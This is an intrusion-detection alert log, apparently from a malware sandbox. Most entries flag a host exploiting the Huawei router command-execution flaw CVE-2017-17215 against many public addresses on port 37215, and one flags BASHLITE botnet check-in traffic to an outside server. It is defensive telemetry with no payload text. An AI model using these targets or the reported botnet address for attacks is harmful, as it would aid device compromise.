                                            06/14/24-10:44:18.760867TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6046637215192.168.2.1441.134.58.74
                                            06/14/24-10:43:34.676029TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3736637215192.168.2.14156.121.47.77
                                            06/14/24-10:44:18.762000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4216437215192.168.2.1441.106.81.209
                                            06/14/24-10:43:41.850017TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4766437215192.168.2.14197.207.12.125
                                            06/14/24-10:44:18.763168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4570837215192.168.2.14197.95.236.193
                                            06/14/24-10:44:31.082407TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5657637215192.168.2.1441.33.174.12
                                            06/14/24-10:43:43.944008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5450237215192.168.2.14156.208.52.55
                                            06/14/24-10:44:02.366059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3799237215192.168.2.14156.42.176.191
                                            06/14/24-10:44:33.151146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4442237215192.168.2.14156.133.73.40
                                            06/14/24-10:44:00.343390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3909637215192.168.2.14197.23.144.42
                                            06/14/24-10:44:24.935138TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5960037215192.168.2.14197.196.36.12
                                            06/14/24-10:43:52.143107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5818237215192.168.2.14197.120.208.208
                                            06/14/24-10:44:24.944692TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5761637215192.168.2.14156.197.192.184
                                            06/14/24-10:43:45.965603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5602037215192.168.2.14197.196.17.49
                                            06/14/24-10:44:10.543051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5966037215192.168.2.14156.108.250.239
                                            06/14/24-10:43:45.969427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5881237215192.168.2.14197.2.115.95
                                            06/14/24-10:43:39.792122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3762437215192.168.2.14156.76.209.128
                                            06/14/24-10:43:41.847454TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5555237215192.168.2.1441.173.185.79
                                            06/14/24-10:44:33.150815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5166037215192.168.2.14197.166.172.58
                                            06/14/24-10:43:37.761666TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4511037215192.168.2.14156.78.243.162
                                            06/14/24-10:44:35.182326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3494037215192.168.2.1441.58.227.164
                                            06/14/24-10:43:33.673512TCP2840515ETPRO TROJAN ELF/BASHLITE Variant Reporting Arch Type (i586)4961023192.168.2.1443.231.232.101
                                            06/14/24-10:44:10.565806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4110237215192.168.2.14156.55.24.145
                                            06/14/24-10:44:35.179807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5615237215192.168.2.14156.199.150.81
                                            06/14/24-10:44:04.423514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3473837215192.168.2.14197.176.95.247
                                            06/14/24-10:44:08.504131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4813837215192.168.2.1441.173.164.46
                                            06/14/24-10:44:02.383590TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4165237215192.168.2.1441.241.255.184
                                            06/14/24-10:44:12.617293TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4968037215192.168.2.1441.1.35.113
                                            06/14/24-10:43:56.224413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4008837215192.168.2.1441.6.232.45
                                            06/14/24-10:43:34.662245TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5192037215192.168.2.1441.65.197.2
                                            06/14/24-10:44:31.053941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5983437215192.168.2.14197.192.41.244
                                            06/14/24-10:44:35.181853TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4434637215192.168.2.1441.141.111.154
                                            06/14/24-10:44:00.322576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4866037215192.168.2.14197.56.4.135
                                            06/14/24-10:44:04.424470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4968237215192.168.2.14197.160.53.91
                                            06/14/24-10:44:02.369245TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3366037215192.168.2.14197.6.43.0
                                            06/14/24-10:44:16.718865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3517637215192.168.2.1441.162.193.246
                                            06/14/24-10:43:54.201844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5272037215192.168.2.1441.44.254.90
                                            06/14/24-10:44:00.326645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4920437215192.168.2.1441.203.157.130
                                            06/14/24-10:44:16.736341TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4857637215192.168.2.14156.228.17.70
                                            06/14/24-10:44:27.000097TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4201637215192.168.2.14156.70.203.157
                                            06/14/24-10:44:31.054645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5735437215192.168.2.1441.175.2.116
                                            06/14/24-10:44:18.765755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5914437215192.168.2.1441.68.249.202
                                            06/14/24-10:44:33.131190TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4405637215192.168.2.14197.155.223.203
                                            06/14/24-10:43:39.809527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4522037215192.168.2.14156.66.191.152
                                            06/14/24-10:43:52.150384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4726237215192.168.2.14156.178.115.70
                                            06/14/24-10:44:29.014899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4556837215192.168.2.14156.128.58.209
                                            06/14/24-10:44:26.999881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3300037215192.168.2.14197.246.220.84
                                            06/14/24-10:43:58.291179TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4512237215192.168.2.14197.158.143.82
                                            06/14/24-10:43:45.966975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5986237215192.168.2.14197.251.43.199
                                            06/14/24-10:44:35.176649TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5330637215192.168.2.14197.186.133.106
                                            06/14/24-10:43:54.185810TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4432837215192.168.2.14197.134.221.19
                                            06/14/24-10:44:33.151299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3472237215192.168.2.14197.137.176.75
                                            06/14/24-10:43:34.676514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5243037215192.168.2.14156.53.176.64
                                            06/14/24-10:43:48.021881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4786237215192.168.2.14156.211.164.111
                                            06/14/24-10:43:54.183732TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4681037215192.168.2.14156.115.164.76
                                            06/14/24-10:44:20.830431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4043037215192.168.2.14197.120.200.189
                                            06/14/24-10:44:20.805599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3889037215192.168.2.1441.195.223.68
                                            06/14/24-10:43:52.146097TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5521437215192.168.2.14156.192.19.8
                                            06/14/24-10:44:31.082171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3332437215192.168.2.14197.49.198.175
                                            06/14/24-10:43:54.186431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4693637215192.168.2.14156.86.223.102
                                            06/14/24-10:43:56.245739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4052437215192.168.2.14156.134.22.117
                                            06/14/24-10:43:54.200127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3953637215192.168.2.1441.75.46.141
                                            06/14/24-10:43:39.789788TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6072637215192.168.2.14156.201.172.52
                                            06/14/24-10:43:48.030269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3499437215192.168.2.14156.62.118.163
                                            06/14/24-10:43:43.971201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4343237215192.168.2.14156.208.132.69
                                            06/14/24-10:44:24.932967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3364837215192.168.2.14156.207.109.188
                                            06/14/24-10:43:58.274787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3866637215192.168.2.1441.3.45.49
                                            06/14/24-10:44:04.421406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4544037215192.168.2.1441.20.242.120
                                            06/14/24-10:44:10.544979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3653637215192.168.2.1441.90.111.135
                                            06/14/24-10:44:27.000588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3865437215192.168.2.1441.174.24.165
                                            06/14/24-10:44:22.861256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3591837215192.168.2.1441.114.248.66
                                            06/14/24-10:43:54.200894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3770237215192.168.2.1441.33.161.241
                                            06/14/24-10:43:41.850555TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3279037215192.168.2.14156.98.207.57
                                            06/14/24-10:44:31.052759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6022637215192.168.2.1441.115.229.54
                                            06/14/24-10:43:41.905240TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3374637215192.168.2.14156.119.57.54
                                            06/14/24-10:44:06.470410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5782237215192.168.2.1441.166.118.123
                                            06/14/24-10:43:54.185782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4935037215192.168.2.1441.118.159.144
                                            06/14/24-10:43:54.202512TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4111237215192.168.2.14156.217.40.73
                                            06/14/24-10:43:50.072932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4549437215192.168.2.14156.215.120.18
                                            06/14/24-10:43:58.277293TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6098837215192.168.2.14156.93.242.170
                                            06/14/24-10:44:12.643734TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4941637215192.168.2.14156.151.112.231
                                            06/14/24-10:44:27.001335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3329437215192.168.2.14197.112.201.236
                                            06/14/24-10:44:10.581705TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4040237215192.168.2.14197.102.24.113
                                            06/14/24-10:44:08.501825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3988237215192.168.2.14156.80.42.59
                                            06/14/24-10:44:00.337758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6040037215192.168.2.14156.110.22.172
                                            06/14/24-10:44:16.717280TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5152037215192.168.2.1441.36.31.130
                                            06/14/24-10:44:02.365850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4481837215192.168.2.14156.62.237.212
                                            06/14/24-10:44:10.547936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5631237215192.168.2.14197.29.204.1
                                            06/14/24-10:44:10.543765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4587437215192.168.2.14156.80.187.192
                                            06/14/24-10:44:22.858384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4129037215192.168.2.1441.142.113.91
                                            06/14/24-10:44:16.716430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5124237215192.168.2.1441.198.205.43
                                            06/14/24-10:44:06.470345TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4348237215192.168.2.14156.140.65.94
                                            06/14/24-10:44:04.420930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4387437215192.168.2.14156.31.92.242
                                            06/14/24-10:44:29.014268TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5450237215192.168.2.14197.71.108.209
                                            06/14/24-10:44:22.860808TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5998837215192.168.2.14156.123.43.89
                                            06/14/24-10:44:14.683248TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5921437215192.168.2.14197.114.213.155
                                            06/14/24-10:43:41.847670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4953037215192.168.2.14197.233.17.165
                                            06/14/24-10:43:45.985111TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4523237215192.168.2.14156.254.173.188
                                            06/14/24-10:43:36.718533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4763637215192.168.2.1441.253.22.215
                                            06/14/24-10:43:52.161389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3911437215192.168.2.1441.14.22.24
                                            06/14/24-10:43:43.968803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5895637215192.168.2.14197.71.90.253
                                            06/14/24-10:44:31.090861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4395037215192.168.2.1441.71.180.143
                                            06/14/24-10:44:04.419619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4741637215192.168.2.1441.6.244.25
                                            06/14/24-10:44:20.804581TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4499637215192.168.2.1441.18.204.198
                                            06/14/24-10:43:41.846621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4573437215192.168.2.14197.105.185.234
                                            06/14/24-10:44:06.452672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3800037215192.168.2.14197.145.11.112
                                            06/14/24-10:44:08.505365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5580437215192.168.2.1441.99.9.164
                                            06/14/24-10:44:26.986053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5887637215192.168.2.14197.137.114.164
                                            06/14/24-10:43:34.678602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3336037215192.168.2.14197.144.100.35
                                            06/14/24-10:44:31.054989TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3370037215192.168.2.14156.203.142.55
                                            06/14/24-10:43:45.987994TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4891837215192.168.2.1441.55.241.87
                                            06/14/24-10:44:12.618164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3920037215192.168.2.14197.221.203.189
                                            06/14/24-10:44:31.054082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5264037215192.168.2.14197.190.174.128
                                            06/14/24-10:44:10.548364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5319237215192.168.2.14197.79.190.147
                                            06/14/24-10:44:04.422200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4312637215192.168.2.1441.52.95.69
                                            06/14/24-10:44:31.053463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5112837215192.168.2.14156.139.82.141
                                            06/14/24-10:44:33.131466TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4009637215192.168.2.14197.195.102.101
                                            06/14/24-10:44:24.932854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6028037215192.168.2.14197.181.119.58
                                            06/14/24-10:43:37.763452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5409437215192.168.2.1441.195.168.65
                                            06/14/24-10:43:36.723904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4497437215192.168.2.1441.113.63.75
                                            06/14/24-10:44:04.420093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5702437215192.168.2.1441.211.134.46
                                            06/14/24-10:44:08.502384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3366637215192.168.2.1441.177.27.225
                                            06/14/24-10:43:39.808667TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4565037215192.168.2.1441.13.206.136
                                            06/14/24-10:44:26.980869TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4824037215192.168.2.1441.50.101.217
                                            06/14/24-10:44:35.183300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3584037215192.168.2.14197.213.183.89
                                            06/14/24-10:43:56.254018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4284637215192.168.2.1441.235.140.178
                                            06/14/24-10:43:52.143302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5084437215192.168.2.14156.168.188.173
                                            06/14/24-10:43:34.676488TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4206437215192.168.2.1441.166.206.128
                                            06/14/24-10:44:00.322629TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3975037215192.168.2.14156.84.217.45
                                            06/14/24-10:43:52.145902TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4526837215192.168.2.14156.129.242.95
                                            06/14/24-10:44:22.860242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3479037215192.168.2.14197.90.168.80
                                            06/14/24-10:44:00.340349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5967437215192.168.2.1441.163.236.213
                                            06/14/24-10:44:02.368148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4204037215192.168.2.1441.114.141.8
                                            06/14/24-10:44:33.149406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5016237215192.168.2.1441.206.15.215
                                            06/14/24-10:44:31.091201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5673637215192.168.2.1441.234.245.134
                                            06/14/24-10:44:10.549054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4925637215192.168.2.1441.3.172.232
                                            06/14/24-10:44:04.408296TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3667837215192.168.2.14156.82.87.144
                                            06/14/24-10:44:29.010288TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3386637215192.168.2.14156.127.131.19
                                            06/14/24-10:44:33.151421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4684237215192.168.2.14197.165.79.231
                                            06/14/24-10:44:06.471501TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3482837215192.168.2.14156.206.74.34
                                            06/14/24-10:43:56.250855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5491637215192.168.2.14156.255.238.28
                                            06/14/24-10:44:35.179003TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4116237215192.168.2.1441.28.254.65
                                            06/14/24-10:43:45.966535TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5791637215192.168.2.14156.173.140.140
                                            06/14/24-10:43:37.761900TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3454437215192.168.2.1441.9.23.80
                                            06/14/24-10:44:22.858099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4609237215192.168.2.14197.115.144.49
                                            06/14/24-10:44:00.325408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3897237215192.168.2.14156.234.8.214
                                            06/14/24-10:43:41.898278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3581237215192.168.2.1441.2.251.42
                                            06/14/24-10:43:41.898361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4242437215192.168.2.1441.55.239.250
                                            06/14/24-10:44:33.131382TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3437237215192.168.2.1441.215.51.58
                                            06/14/24-10:43:34.679627TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4304837215192.168.2.1441.99.251.245
                                            06/14/24-10:43:43.942195TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4386837215192.168.2.14156.40.178.45
                                            06/14/24-10:44:18.766211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4243837215192.168.2.1441.220.192.39
                                            06/14/24-10:44:31.053276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4323037215192.168.2.1441.21.142.157
                                            06/14/24-10:43:56.242990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5483437215192.168.2.14156.177.125.144
                                            06/14/24-10:43:36.701893TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3407837215192.168.2.14197.252.148.60
                                            06/14/24-10:43:34.662476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3794637215192.168.2.1441.150.152.40
                                            06/14/24-10:43:50.074555TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4321637215192.168.2.14197.254.126.111
                                            06/14/24-10:43:48.018597TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5967637215192.168.2.1441.151.188.231
                                            06/14/24-10:43:45.985178TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4747437215192.168.2.14156.61.68.188
                                            06/14/24-10:44:18.762174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3299237215192.168.2.14156.62.253.132
                                            06/14/24-10:44:14.684669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3344837215192.168.2.1441.113.99.236
                                            06/14/24-10:43:48.020203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5274837215192.168.2.14197.11.73.63
                                            06/14/24-10:43:39.807388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5231837215192.168.2.14197.151.44.186
                                            06/14/24-10:44:33.131881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5049837215192.168.2.14156.50.38.207
                                            06/14/24-10:43:43.969111TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5833637215192.168.2.1441.32.192.182
                                            06/14/24-10:44:00.322718TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5267837215192.168.2.14197.146.109.191
                                            06/14/24-10:43:41.848698TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3795837215192.168.2.14156.235.60.2
                                            06/14/24-10:44:29.024153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3296237215192.168.2.14197.209.133.8
                                            06/14/24-10:43:56.231072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5441437215192.168.2.14156.139.214.197
                                            06/14/24-10:44:14.683750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4430237215192.168.2.1441.223.121.125
                                            06/14/24-10:44:18.762336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5027237215192.168.2.1441.160.190.201
                                            06/14/24-10:44:31.056326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5930637215192.168.2.14197.205.111.107
                                            06/14/24-10:44:12.625231TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3550637215192.168.2.14197.162.89.224
                                            06/14/24-10:43:39.811588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3331237215192.168.2.14156.48.241.25
                                            06/14/24-10:44:24.915854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5122037215192.168.2.1441.171.109.34
                                            06/14/24-10:43:43.971652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4416037215192.168.2.1441.49.197.82
                                            06/14/24-10:43:43.941509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5688037215192.168.2.14156.198.208.140
                                            06/14/24-10:44:12.615130TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3756437215192.168.2.14156.45.132.159
                                            06/14/24-10:43:58.292987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4754837215192.168.2.14197.211.36.73
                                            06/14/24-10:44:14.669074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5249237215192.168.2.14197.10.36.181
                                            06/14/24-10:44:33.134363TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6001837215192.168.2.14197.234.70.37
                                            06/14/24-10:43:45.988081TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3338037215192.168.2.14156.169.177.10
                                            06/14/24-10:43:54.198926TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5793837215192.168.2.14156.208.166.113
                                            06/14/24-10:44:35.176785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5288237215192.168.2.14197.64.208.247
                                            06/14/24-10:43:41.848466TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3827037215192.168.2.1441.18.12.5
                                            06/14/24-10:43:52.163190TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4953837215192.168.2.14197.22.115.98
                                            06/14/24-10:43:36.728584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4482237215192.168.2.14197.89.96.100
                                            06/14/24-10:43:34.675706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4701237215192.168.2.1441.148.2.72
